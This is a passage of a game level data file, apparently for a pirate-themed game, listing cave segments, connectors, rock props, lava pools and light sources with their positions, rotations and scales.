{'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(50.108, 0.0, 0.0),'Pos': Point3(28.956, -31.051, -5.687),'Scale': VBase3(1.102, 1.102, 1.102),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1237590784.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-37.172, 0.0, 0.0),'Pos': Point3(-38.285, -165.456, -4.611),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','VisZone': '2_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}}},'Pos': Point3(0.0, 0.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_fourway200'}},'1235611061.09akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611061.11akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611061.09akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611061.13akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611061.09akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-100.0, -100.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611035.98akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611115.91akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611115.92akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611115.91akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611147.86akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611115.91akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-525.0, -275.0, 158.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611115.91akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611116.59akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(0.0, 0.0, 0.0),'Objects': {'1235611116.61akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611116.59akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237573872.64akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(-180.0, 0.0, 0.0),'Objects': {'1237573913.83akelts': {'Type': 'Locator Node','Name': 'portal_interior_1','Hpr': Point3(0.0, 0.0, 0.0),'Parent Uid': '1237573872.64akelts','Pos': Point3(0.0, -0.088, 0.254),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-0.231, -70.214, 3.791),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611116.59akelts','Visual': {'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}}},'Pos': Point3(-525.0, -275.0, 158.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611115.91akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100_entrance'}},'1235611117.05akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611117.06akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611117.05akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611170.42akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611117.05akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(100.0, -100.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611117.31akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611117.33akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611117.31akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611198.48akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611117.31akelts','Pos': Point3(0.0, -150.0, 41.991),'Scale': VBase3(1.0, 1.0, 1.0)},'1237594368.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-126.499, 0.0, 0.0),'Pos': Point3(22.615, -74.782, 12.516),'Scale': VBase3(1.245, 1.245, 1.351),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}}},'Pos': Point3(200.0, -100.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611117.05akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrowAscend'}},'1235611117.69akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(0.0, 0.0, 0.0),'Objects': {'1235611117.7akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611117.69akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611209.75akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611117.69akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(525.0, 75.0, 241.991),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1236293632.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611119.02akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611119.03akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611119.02akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611298.88akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611119.02akelts','Pos': Point3(75.0, -75.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611298.89akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611119.02akelts','Pos': Point3(-75.0, -75.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237582208.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-91.2, 0.0, 0.0),'Pos': Point3(11.389, -96.256, -0.225),'Scale': VBase3(2.425, 2.425, 2.425),'VisSize': 'Large','VisZone': '2_1235611119.02akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_pool_lavaC'}}},'Pos': Point3(0.0, -200.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611035.98akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway150'}},'1235611119.33akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1235611119.34akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611119.33akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611307.05akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611119.33akelts','Pos': Point3(75.0, -75.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611307.06akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611119.33akelts','Pos': Point3(-75.0, -75.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237590912.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(67.269, 0.0, 0.0),'Pos': Point3(65.645, -42.025, -3.029),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','VisZone': '3_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1238123189.34kmuller': {'Type': 'Light - Modular','ConeAngle': '81.4157','ConstantAttenuation': '0.5904','DropOff': '0.0000','Hpr': VBase3(-180.0, -17.526, 0.0),'LightSphere': True,'LightType': 'POINT','LinearAttenuation': '0.0000','Pos': Point3(1.547, -101.042, 18.277),'QuadraticAttenuation': '0.2771','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '2_1235611119.33akelts','Visual': {'Color': (0.9, 0.48, 0.13, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238128143.19kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(107.931, 0.0, 0.0),'Pos': Point3(24.201, -18.423, 0.065),'Scale': VBase3(0.69, 0.69, 0.76),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}}},'Pos': Point3(0.0, 0.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway150_lava'}},'1235611119.91akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611119.92akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611119.91akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611316.72akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611119.91akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584512.0akelts': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(178.728, 0.0, 0.0),'Pos': Point3(-0.482, -62.944, 0.0),'Scale': VBase3(1.313, 1.313, 1.313),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cem_gate_english'}},'1237588864.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(34.692, 0.0, 0.0),'Pos': Point3(15.447, -72.374, -2.221),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237588864.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-128.809, 0.0, 0.0),'Pos': Point3(-23.326, -68.662, 1.046),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1238123329.65kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(0.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0127','Pos': Point3(-1.943, -52.335, 8.712),'QuadraticAttenuation': '0.1747','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '1_1235611119.91akelts','Visual': {'Color': (0.94, 0.52, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}}},'Pos': Point3(75.0, 75.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611120.45akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611120.47akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611120.45akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611328.42akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611120.45akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827147.39akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(42.821, 0.017, 169.654),'Pos': Point3(-24.334, -20.783, 29.172),'Scale': VBase3(5.545, 5.545, 5.545),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_h'}},'1238123885.11kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(0.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0343','Pos': Point3(-67.237, -148.457, 8.818),'QuadraticAttenuation': '0.1928','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '1_1235611120.45akelts','Visual': {'Color': (1.0, 0.71, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}}},'Pos': Point3(350.0, 250.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611120.45akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611121.0akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611121.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611121.0akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611141.33akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611121.0akelts','Pos': Point3(0.0, -150.0, -42.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237588608.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.0, 14.546, -157.689),'Pos': Point3(5.371, -120.77, 4.706),'Scale': VBase3(1.675, 1.675, 0.952),'VisSize': 'Large','VisZone': '0_1235611121.0akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}}},'Pos': Point3(-200.0, -100.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611121.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrowDescend'}},'1235611344.81akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(360.0, 0.0, 0.0),'Objects': {'1235611344.83akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611344.81akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611344.89akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611344.81akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(250.0, 450.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611344.81akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611347.08akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611347.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611347.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611347.16akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611347.08akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(300.0, 300.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611361.5akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrow100'}},'1235611348.2akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611348.22akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611348.2akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611348.28akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611348.2akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(200.0, 300.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611347.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611348.83akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611348.84akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611348.83akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(150.0, 250.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611348.83akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611352.23akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611352.3akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611352.23akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(200.0, 500.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611352.23akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611352.94akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(450.0, 0.0, 0.0),'Objects': {'1235611352.95akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611352.94akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611352.97akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611352.94akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611353.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611352.94akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827053.79akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-128.553, 0.0, 16.323),'Pos': Point3(49.82, -25.985, -1.642),'Scale': VBase3(1.248, 1.248, 1.248),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237827221.59akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-49.526, 12.195, -169.214),'Pos': Point3(-44.773, -39.047, 36.683),'Scale': VBase3(5.545, 5.545, 5.545),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_i'}},'1237827472.21akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(141.447, 0.0, -21.643),'Pos': Point3(-29.03, -9.062, -4.06),'Scale': VBase3(1.248, 1.248, 1.749),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}}},'Pos': Point3(300.0, 400.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611344.81akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611353.63akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1235611353.64akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611353.63akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235686400.0akelts1': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611353.63akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827511.65akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-38.536, 0.042, -21.643),'Pos': Point3(15.899, -28.795, -5.35),'Scale': VBase3(1.659, 1.373, 1.189),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1237827546.46akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(141.447, 0.0, -21.643),'Pos': Point3(-2.405, -79.498, -8.856),'Scale': VBase3(1.508, 1.248, 1.081),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}}},'Pos': Point3(250.0, 450.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611344.81akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611361.5akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(450.0, 0.0, 0.0),'Objects': {'1235611361.55akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611361.5akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611361.56akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611361.5akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611361.58akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611361.5akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827026.68akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.993, 0.0, 0.0),'Pos': Point3(46.862, -60.316, -0.02),'Scale': VBase3(0.593, 0.593, 0.593),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1237827576.62akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(51.447, 0.0, -21.643),'Pos': Point3(-14.326, -20.546, -10.031),'Scale': VBase3(1.508, 1.248, 1.081),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1238124363.02kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.0, 0.0, 0.0),'Pos': Point3(17.253, -40.298, 18.138),'Scale': VBase3(0.415, 0.415, 0.415),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_stite_med'}},'1238124424.97kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.0, 0.0, 0.0),'Pos': Point3(18.839, -64.68, -0.475),'Scale': VBase3(0.862, 0.862, 0.862),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_smites_single_grooves'}},'1238124454.94kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.0, 0.0, 0.0),'Pos': Point3(18.85, -32.635, 17.474),'Scale': VBase3(0.27, 0.27, 0.27),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_stite_single'}},'1238124512.89kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-133.832, 0.0, 0.0),'Pos': Point3(-2.489, -22.842, -0.262),'Scale': VBase3(0.377, 0.377, 0.377),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_column_large'}},'1238124542.84kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-180.0, -2.343, -2.966),'Pos': Point3(36.597, -54.375, 14.045),'Scale': VBase3(0.415, 0.415, 0.415),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_stite_med'}},'1238124581.13kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(11.112, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0127','Pos': Point3(-5.516, -33.224, 7.652),'QuadraticAttenuation': '0.1747','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '2_1235611361.5akelts','Visual': {'Color': (1.0, 0.71, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238124674.48kmuller': {'Type': 'Light_Fixtures','DisableCollision': False,'Holiday': '','Hpr': VBase3(31.843, 0.0, 0.0),'Pos': Point3(-5.396, -27.554, -0.245),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/torch'}}},'Pos': Point3(300.0, 300.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611361.5akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611519.63akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611519.69akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611519.63akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611549.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611519.63akelts','Pos': Point3(0.0, -150.0, 42.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237591040.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(18.807, -5.357, 0.0),'Pos': Point3(-34.755, -129.84, 16.22),'Scale': VBase3(1.393, 1.393, 1.393),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1238122175.84kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(90.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0127','Pos': Point3(23.37, -90.963, 38.952),'QuadraticAttenuation': '0.1747','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.94, 0.63, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238123123.41kmuller': {'Type': 'Light - Modular','ConeAngle': '60.0000','ConstantAttenuation': '0.9639','DropOff': '0.0000','Hpr': VBase3(90.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0127','Pos': Point3(-23.434, -8.576, 15.223),'QuadraticAttenuation': '0.1747','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','VisZone': '0_1235611519.63akelts','Visual': {'Color': (0.94, 0.52, 0.12, 1.0),'Model': 'models/props/light_tool_bulb_modular'}}},'Pos': Point3(-75.0, 75.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611519.63akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallWideAscend'}},'1235611528.14akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(450.0, 0.0, 0.0),'Objects': {'1235611528.16akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611528.14akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611602.09akelts': {'Type': 